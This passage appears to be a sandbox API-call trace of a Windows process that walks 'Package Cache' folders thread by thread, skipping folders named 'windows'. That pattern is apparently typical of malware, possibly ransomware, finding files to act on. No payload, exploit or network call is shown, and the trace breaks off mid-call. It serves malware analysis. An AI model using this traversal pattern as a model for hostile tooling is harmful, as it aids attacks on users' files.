ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcb95720, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcb95720, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.496] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.496] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.496] FindNextFileW (in: hFindFile=0x6710b0, lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0047.496] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_x86") returned -1 [0047.496] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_x86") returned -1 [0047.496] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_x86") returned 1 [0049.052] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*" [0049.052] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*") returned 99 [0049.052] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", lpString2="vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86" [0049.052] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*" [0049.052] GlobalMemoryStatus (in: lpBuffer=0xe68fd10 | out: lpBuffer=0xe68fd10) [0049.052] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x109b8950, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x360 [0049.059] CloseHandle (hObject=0x360) returned 1 [0049.059] FindNextFileW (in: hFindFile=0x6710b0, lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb95720, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0xcbbb880, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0xcbbb880, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0049.060] FindClose (in: hFindFile=0x6710b0 | out: hFindFile=0x6710b0) returned 1 Thread: id = 542 os_tid = 0xcbc [0047.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*", lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6712b0 [0047.497] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.497] FindNextFileW (in: hFindFile=0x6712b0, lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfabe4080, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfabe4080, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.497] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.497] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.497] FindNextFileW (in: hFindFile=0x6712b0, lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0047.497] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_amd64") returned -1 [0047.497] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_amd64") returned -1 [0047.497] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_amd64") returned 1 [0049.058] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*" [0049.059] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*.*") returned 99 [0049.059] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\", lpString2="vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0049.059] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*.*" [0049.059] GlobalMemoryStatus (in: lpBuffer=0xe78fd10 | out: lpBuffer=0xe78fd10) [0049.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e46d00, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x628 [0049.066] CloseHandle (hObject=0x628) returned 1 [0049.066] FindNextFileW (in: hFindFile=0x6712b0, lpFindFileData=0xe78fd30 | out: lpFindFileData=0xe78fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfabe4080, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xfac0a1e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xfac0a1e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0049.066] FindClose (in: hFindFile=0x6712b0 | out: hFindFile=0x6712b0) returned 1 Thread: id = 543 os_tid = 0xcc0 [0047.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*", lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671db0 [0047.802] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.802] FindNextFileW (in: hFindFile=0x671db0, lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.802] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.802] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.802] FindNextFileW (in: hFindFile=0x671db0, lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0047.802] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_x86") returned -1 [0047.802] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_x86") returned -1 [0047.802] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_x86") returned 1 [0049.161] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*" [0049.161] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*.*") returned 100 [0049.161] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\", lpString2="vcRuntimeMinimum_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86" [0049.161] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*.*" [0049.161] GlobalMemoryStatus (in: lpBuffer=0xe88fd10 | out: lpBuffer=0xe88fd10) [0049.161] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x24e16c58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x2c0 [0049.167] CloseHandle (hObject=0x2c0) returned 1 [0049.167] FindNextFileW (in: hFindFile=0x671db0, lpFindFileData=0xe88fd30 | out: lpFindFileData=0xe88fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0049.167] FindClose (in: hFindFile=0x671db0 | out: hFindFile=0x671db0) returned 1 Thread: id = 544 os_tid = 0xcc4 [0047.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*", lpFindFileData=0x162dfd30 | out: lpFindFileData=0x162dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6719b0 [0047.802] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.802] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x162dfd30 | out: lpFindFileData=0x162dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94d4300, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94d4300, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.802] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.802] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.802] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x162dfd30 | out: lpFindFileData=0x162dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0047.802] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_x86") returned -1 [0047.802] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_x86") returned -1 [0047.803] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_x86") returned 1 [0049.166] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*" [0049.166] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*.*") returned 100 [0049.166] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\", lpString2="vcRuntimeAdditional_x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86" [0049.166] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*.*" [0049.166] GlobalMemoryStatus (in: lpBuffer=0x162dfd10 | out: lpBuffer=0x162dfd10) [0049.166] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116217a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6e0 [0049.172] CloseHandle (hObject=0x6e0) returned 1 [0049.172] FindNextFileW (in: hFindFile=0x6719b0, lpFindFileData=0x162dfd30 | out: lpFindFileData=0x162dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94d4300, ftCreationTime.dwHighDateTime=0x1d2fc27, ftLastAccessTime.dwLowDateTime=0xf94fa460, ftLastAccessTime.dwHighDateTime=0x1d2fc27, ftLastWriteTime.dwLowDateTime=0xf94fa460, ftLastWriteTime.dwHighDateTime=0x1d2fc27, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0049.172] FindClose (in: hFindFile=0x6719b0 | out: hFindFile=0x6719b0) returned 1 Thread: id = 545 os_tid = 0xcc8 [0047.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*", lpFindFileData=0x163dfd30 | out: lpFindFileData=0x163dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671c30 [0047.804] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.804] FindNextFileW (in: hFindFile=0x671c30, lpFindFileData=0x163dfd30 | out: lpFindFileData=0x163dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa931c450, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa931c450, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.804] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.804] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.804] FindNextFileW (in: hFindFile=0x671c30, lpFindFileData=0x163dfd30 | out: lpFindFileData=0x163dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0047.804] lstrcmpW (lpString1=".", lpString2="vcRuntimeMinimum_amd64") returned -1 [0047.805] lstrcmpW (lpString1="..", lpString2="vcRuntimeMinimum_amd64") returned -1 [0047.805] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeMinimum_amd64") returned 1 [0049.171] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*" [0049.171] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*.*") returned 100 [0049.171] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\", lpString2="vcRuntimeMinimum_amd64" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64" [0049.171] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\*.*" [0049.171] GlobalMemoryStatus (in: lpBuffer=0x163dfd10 | out: lpBuffer=0x163dfd10) [0049.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10e7f038, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x49c [0049.175] CloseHandle (hObject=0x49c) returned 1 [0049.175] FindNextFileW (in: hFindFile=0x671c30, lpFindFileData=0x163dfd30 | out: lpFindFileData=0x163dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa931c450, ftCreationTime.dwHighDateTime=0x1d2fab4, ftLastAccessTime.dwLowDateTime=0xa93425b0, ftLastAccessTime.dwHighDateTime=0x1d2fab4, ftLastWriteTime.dwLowDateTime=0xa93425b0, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeMinimum_amd64", cAlternateFileName="VCRUNT~1")) returned 0 [0049.175] FindClose (in: hFindFile=0x671c30 | out: hFindFile=0x671c30) returned 1 Thread: id = 546 os_tid = 0xccc [0047.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*", lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x671e70 [0047.498] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.498] FindNextFileW (in: hFindFile=0x671e70, lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a20bca0, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a20bca0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.498] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0047.498] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0047.498] FindNextFileW (in: hFindFile=0x671e70, lpFindFileData=0x164dfd30 | out: lpFindFileData=0x164dfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x1a257f60, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0047.498] lstrcmpW (lpString1=".", lpString2="vcRuntimeAdditional_amd64") returned -1 [0047.499] lstrcmpW (lpString1="..", lpString2="vcRuntimeAdditional_amd64") returned -1 [0047.499] lstrcmpiW (lpString1="windows", lpString2="vcRuntimeAdditional_amd64") returned 1 [0049.064] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\*.*" [0049.064] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package 